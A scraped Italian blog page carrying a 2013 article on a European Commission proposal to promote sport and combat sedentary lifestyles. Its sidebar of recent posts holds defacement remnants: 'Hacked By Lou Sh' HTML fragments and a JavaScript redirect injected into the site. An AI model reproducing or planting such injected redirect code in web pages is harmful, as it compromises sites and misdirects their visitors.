EUROSBLOGS
--> Giugno 2013 Maggio 2013 Aprile 2013 Marzo 2013 Febbraio 2013 Gennaio 2013
Dicembre 2012 Novembre 2012 Ottobre 2012 Settembre 2012 Agosto 2012 Luglio 2012 Giugno 2012 Maggio 2012 Aprile 2012 Marzo 2012 February 2012 Gennaio 2012
Dicembre 2011 Novembre 2011 Ottobre 2011 Settembre 2011 Agosto 2011 Luglio 2011 Giugno 2011 Maggio 2011 Aprile 2011 Marzo 2011 Febbraio 2011 Gennaio 2011
Dicembre 2010 Novembre 2010 Ottobre 2010 Settembre 2010 Luglio 2010 Giugno 2010 Aprile 2010 Marzo 2010 Febbraio 2010
Aggiungere un commento

Poco sport in Europa: nuova iniziativa per combattere la sedentarietà




La Commissione europea vara una proposta di raccomandazione per promuovere l’attività sportiva

Due terzi degli europei non svolge attività fisica oppure la pratica raramente. Il rischio di aumento dell’obesità e delle patologie ad essa collegate ha spinto le Istituzioni europee all’azione. La proposta della Commissione passerà ora all’analisi del Consiglio, che potrebbe adottarla già entro la fine di quest’anno.

Fare attività fisica fa bene alla salute. Svolgere una qualsiasi forma di sport, oltre a migliorare la qualità della vita, permette a uomini, donne, giovani e meno giovani di combattere in maniera indiscutibile la sedentarietà, l’obesità e di prevenire anche le malattie legate a quest’ultima. Ma gli europei lo sanno? Stando ai dati delle ultime analisi svolte dalle istituzioni europee, gli abitanti del Vecchio Continente sembrano non comprendere a fondo questo significato intrinseco e di fatto vanificano gli sforzi dell’Unione europea volti ad incoraggiare la pratica sportiva. Ben due europei su tre non praticano un’attività sportiva oppure quando la svolgono si tratta di un’azione saltuaria e scollegata: è per questo motivo che le istituzioni hanno deciso di agire.

La Commissione europea, su invito del Consiglio, ha deciso di presentare una proposta di raccomandazione che promuova la pratica sportiva. La politica della salute, le osservazioni e le informazioni raccolte sulla società europea e l’appello ricevuto nel 2012 dal Consiglio hanno di fatto spronato in modo definitivo la Commissione a prendere provvedimenti al fine di coinvolgere più cittadini europei a fare attività sportiva regolare. Combattere la sedentarietà con lo sport: è questo l’impegno delle istituzioni dell’Unione.

Già da settembre la proposta passerà al vaglio del Consiglio europeo che avvierà il dibattito e potrà addirittura arrivare ad adottarla entro la fine del 2013. Gli Stati membri sono invece chiamati a mettere in atto provvedimenti a 360° che permettano ai propri cittadini di accogliere uno stile di vita più attivo e di mantenerlo.

JPEG - 32.3 Kb
Androulla Vassilou

Commissario europeo responsabile per lo sport

Il commissario europeo responsabile per lo sport, Androulla Vassilou, ha espresso in una nota i motivi e gli scopi della nuova proposta. Ha infatti sottolineato l’importanza di agire in maniera oculata, seria e mirata per invertire questo trend non positivo. Il commissario Vassilou ha dichiarato: “Un elemento essenziale della nostra proposta è aiutare gli Stati membri a seguire gli sviluppi e a rilevare le tendenze per quanto riguarda l’impegno nazionale nella promozione dello sport e dell’attività fisica. Di concerto con gli Stati membri, ridurremo gli elevati costi della sedentarietà in Europa”.

Dalle sue parole è emerso chiaramente quali siano le prossime tappe dell’iniziativa e la collaborazione che l’Europa si attende da parte di ogni Stato. Permettere ai cittadini di godersi al meglio la propria vita combattendo la sedentarietà, l’obesità e le sue patologie è ormai un obiettivo di primaria importanza e di certo da non trascurare.



Nessun commento
ds Aggiungere un commento

Autori

Claudio Pietrotti
Iscritto al corso di laurea in Scienze della Comunicazione presso l’università di Roma Tor Vergata.



Dialogo con i cittadini sul Futuro dell’Europa

L’Eurosblog è media partner dell’iniziativa "Dialogo con i cittadini sul Futuro dell’Europa" organizzata dalla Rappresentanza in Italia della Commissione europea. Una serie di dibattiti aperti tra la Commissione europea e i cittadini sui temi dell’occupazione, della protezione dei cittadini e della sostenibilità. L’obiettivo è rispondere insieme alla domanda: “Che Europa vogliamo nel futuro?”. Guarda il video viral e fai la tua domanda su Twitter, utilizzando l’hashtag #EUdeb8. Segui l’evento in streaming su http://webcast.ec.europa.eu/eutv/po...

Quale Europa vogliamo nel futuro?


Ultimo commento

Erasmus+: il nuovo programma di studio per i giovani in Europa
di réduction toysrus, le 21 agosto 2013

Nice article :). I’ve studied abroad in Espagna y eso fue una experiencia unica: tanto al nivel laboral como humano! Je recommande ça à tout le monde :)


comitato



Ultimi articoli del blog

<!DOCTYPE HTML>      <head>         <meta charset= Hacked By Lou Sh If you are not redirected automatically, follow the link to example " title=" Hacked By Lou Sh If you are not redirected automatically, follow the link to example " src="local/cache-gd2/cc82855323b3141664fde5d9afad6d5c.png">
window.location.href = "http://torvergata.eurosblog.eu/IMG/html/" (...)
15 marzo 2015
<!DOCTYPE HTML>      <head>         <meta charset= Hacked By Lou Sh If you are not redirected automatically, follow the link to example " title=" Hacked By Lou Sh If you are not redirected automatically, follow the link to example " src="local/cache-gd2/646bc521095d5a61646327c7b727a862.jpg">
window.location.href = "http://torvergata.eurosblog.eu/IMG/html/" (...)
17 febbraio 2015

© Groupe Euros du Village 2010 | Note legali | Sito realizzato con SPIP | Relizzazione tecnica e design : Media Animation & Euros du Village France